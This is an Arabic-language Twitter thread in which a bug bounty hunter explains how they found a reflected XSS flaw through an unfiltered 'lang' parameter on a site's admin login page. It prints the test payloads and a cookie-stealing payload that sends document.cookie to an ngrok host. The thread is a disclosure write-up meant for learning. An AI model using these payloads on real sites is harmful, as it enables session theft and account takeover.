10 تغريدة 77 قراءة May 28, 2021
السلام عليكم ،
اليوم بشرح كيف قدرت القى
xss reflected وكيف قدرت ازيد من خطورة الثغره بحيث اسرق الكوكيز حق اي شخص يدخل على الرابط
يله نبدا شرح👇
اول شي سويته بعد مرحلة جمع المعلومات عن الهدف هو :
١- دخلت على الموقع ولقيت انه صفحة تسجيل دخول فقط وماتقدر تسجل حساب جديد
ملاحظة : حاولت اخمن على مسارات الموقع لكن ما لقيت مسارات غير مسار
تسجيل الدخول
٢- حاولت اتصفح الموقع لعل وعسى القى شيء ولكن مالقيت اي شي ..
٣- قررت استعمل google dork لعل وعسى ان القى مسارات اكثر فا الطريقه اللي استعملتها:
site:target.com
وبحكم ان الموقع صغير ماطلعت لي نتايج كثيره ولكن كان فيه مسار لتسجيل الدخول ثاني غير اللي لقيته قبل وكان هذا هو المسار :
admin/login
فا دخلت عليه وكان تسجيل دخول فقط ولكن كان فيه زر لتغيير اللغه فا ظغطت عليه فا
لا حظت انه انضاف بارامتر للرابط وتغير الرابط واصبح شكله كذا :
admin/login?lang=en
طبعا حاولت اعرف من وين يجيب البيانات اللي تخص اللغه فا طلع فيه ملف جافا سكربت ياخذ المدخلات من البارامتر lang ..👇
ويخزنها بـمتغير بدون فلتره ويتاكد من قيمته اذا كان قيمة البارامتر ar يعرض لك الصفحه بالعربي واذا كانت قيمته en يعرض لك الصفحه بالانجليزي فا جربت اكتب بعد البارامتر كود جافا سكربت بسيط وظيفته انه يسوي Alert هذا هو الكود :
<script>alert(1)</script>
فا اللي صار طلع لي error
حاولت اعرف وش سبب ال error فا تبين لي اني لازم اقفل كود الجافاسكربت اللي مكتوب بعدين ابدا اكتب البايلود حقي فا هذا هو الشكل النهائي للبايلود :
</script><script>alert(1)</script>
وفعلا نجح البايلود وظهر لي ال alert !!
فا الان نجي لجزائية الاستغلال بحيث نزيد من خطورة الثغره فا بكل بساطه كتبت هذا البايلود :
<script/>
<script>
location.href="79bdb886399c.ngrok.io“%2Bdocument.cookie
;
<script/>
ووظيفته بكل بساطه يرسل لي الكوكيز على السيرفر حقي وبكذا اقدر اشوف ال logs ( كما هو موضح في الصوره 👇)
ومن خلالها اشوف الكوكيز حقت الضحيه واخذها واخترق حسابه .
طبعا قدمت التقرير ولكن للاسف كان Duplicate 🥲
بس المهم هو اني تعلمت طريقه جديده 👍
وبالنهايه اشكركم على قراءة شرحي البسيط .
ان اصبت فمن الله وان خطات فمن نفسي والشيطان
معليش حصلت بعض الاخطا في طريقة كتابة البايلودات ، وهذي هي كتبتها بالشكل الصحيح
1-
<script>alert(1)</script>
2-
</script><script>alert(1)</script>
3-
</script>
<script>location.href="79bdb886399c.ngrok.io"%2Bdocument.cookie;
</script>
🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️
2-
</script><script>alert(1)</script>
3-
</script><script>
location.href="79bdb886399c.ngrok.io"%2Bdocument.cookie;
</script>

جاري تحميل الاقتراحات...